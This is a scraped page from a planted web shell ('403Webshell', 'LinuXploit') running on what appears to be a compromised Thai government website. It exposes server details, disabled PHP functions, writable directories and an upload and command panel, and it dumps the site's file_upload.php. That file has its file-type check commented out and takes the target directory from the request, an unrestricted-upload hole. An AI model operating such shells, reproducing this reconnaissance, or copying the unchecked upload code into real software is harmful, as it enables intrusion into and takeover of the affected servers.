403Webshell
Server IP : 119.59.102.212  /  Your IP : 3.147.48.161
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/private_html/coremain/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/private_html/coremain/file_upload.php
<?php
session_start();
include('function_msg.php');

$post = $_POST;
$path_dir = $post['path_dir'];
$output_dir = '../'.$_SESSION['web_name'].'/'.$path_dir.'/';
$prefix = isset($post['prefix']) ? $post['prefix'] : '';
$thumb = isset($post['thumb']) ? $post['thumb'] : '';
unset($post['path_dir'], $post['prefix'], $post['thumb']);
if(isset($_FILES["fname"]) && $_SESSION['web_name'] != '' && $path_dir != ''){
  
  $ret = array_merge(array(), $post);
  
  $file_upload = trim($_FILES['fname']['name']);

//  // เช็คไฟล์ว่าถูกต้องหรือไม่
//  $chk = check_file($file_upload);
//
//  if($chk == 'OK'){
    
    // Create_Filename
    $file_name = $prefix. create_filename($file_upload);
    $dlink = $output_dir . $file_name;
    if($thumb == 'thumb'){
      $thumb_dlink = $output_dir.'thumb/'.$file_name;
	  upload_file_to_server($dlink, $_FILES['fname'], $thumb_dlink);
//      upload_file_to_server2($output_dir, $name, $_FILES['fname'], $output_dir.'thumb/');
    }else{
      upload_file_to_server($dlink, $_FILES['fname']);
//	  upload_file_to_server2($output_dir, $name, $_FILES['fname']);
    }

    $ret['file_name'] = $file_name;
//    $ret['file_type'] = mime_content_type($dlink);
      
//  }
  
  echo json_encode($ret);

}

	
////	This is for custom errors;	
///*	$custom_error= array();
//	$custom_error['jquery-upload-file-error']="File already exists";
//	echo json_encode($custom_error);
//	die();
//*/
//	$error =$_FILES["myfile"]["error"];
//	//You need to handle  both cases
//	//If Any browser does not support serializing of multiple files using FormData() 
//	if(!is_array($_FILES["myfile"]["name"])) //single file
//	{
// 	 	$fileName = iconv('utf-8', 'tis-620', $_FILES["myfile"]["name"]);
// 		move_uploaded_file($_FILES["myfile"]["tmp_name"],$output_dir.$fileName);
//    	$ret[]= $fileName;
//	}
//	else  //Multiple files, file[]
//	{
//	  $fileCount = count($_FILES["myfile"]["name"]);
//	  for($i=0; $i < $fileCount; $i++)
//	  {
//	  	$fileName = iconv('utf-8', 'tis-620', $_FILES["myfile"]["name"][$i]);
//		move_uploaded_file($_FILES["myfile"]["tmp_name"][$i],$output_dir.$fileName);
//	  	$ret[]= $fileName;
//	  }
//	
//	}
//    //echo json_encode($ret);
// }
 

//if ($p_check_pic1 != "") {
//  $check_pic1 = trim($p_check_pic1);
//}
//if ($p_check_pic2 != "") {
//  $check_pic2 = trim($p_check_pic2);
//}
//if ($p_check_pic3 != "") {
//  $check_pic3 = trim($p_check_pic3);
//}
//
//$userfile1_name = trim($_FILES['userfile1']['name']);
//$userfile2_name = trim($_FILES['userfile2']['name']);
//$userfile3_name = trim($_FILES['userfile3']['name']);
//
//// เช็คไฟล์ว่าถูกต้องหรือไม่
//if ($userfile1_name != "") {
//  check_file($userfile1_name);
//}
//if ($userfile2_name != "") {
//  check_file($userfile2_name, 2);
//}
//if ($userfile3_name != "") {
//  check_file($userfile3_name, 3);
//}
//
//// Create_Filename
//if ($userfile1_name != "") {
//  $name1 = create_filename($userfile1_name);
//  $dlink = "$_SESSION[web_name]/mainfile/" . $name1;
//  delete_filename("cms_blog", "file1", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
//  upload_file_to_server($dlink, $_FILES['userfile1']);
//}
//if ($userfile2_name != "") {
//  $name2 = create_filename($userfile2_name);
//  $dlink = "$_SESSION[web_name]/mainfile/" . $name2;
//  delete_filename("cms_blog", "file2", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
//  upload_file_to_server($dlink, $_FILES['userfile2']);
//}
//if ($userfile3_name != "") {
//  $name3 = create_filename($userfile3_name);
//  $dlink = "$_SESSION[web_name]/mainfile/" . $name3;
//  delete_filename("cms_blog", "file3", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
//  upload_file_to_server($dlink, $_FILES['userfile3']);
//}
//
//// ######## เอาไฟล์ออกจากระบบ #######
//if ($check_pic1 == "1" && $userfile1_name == "") {
//  check_pic_out("cms_blog", "file1", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
//  $name1 = "";
//}
//if ($check_pic2 == "1" && $userfile2_name == "") {
//  check_pic_out("cms_blog", "file2", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
//  $name2 = "";
//}
//if ($check_pic3 == "1" && $userfile3_name == "") {
//  check_pic_out("cms_blog", "file3", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
//  $name3 = "";
//}
//
//$sql = "UPDATE `cms_blog` SET `fulltexts` = '$fulltexts' ,file1='$name1', file2='$name2', file3='$name3' WHERE `id_sub` = '$_SESSION[id_sub]'";
//$result = mysql_query($sql) or die(mysql_error());


?>

Youez - 2016 - github.com/yon3zu
LinuXploit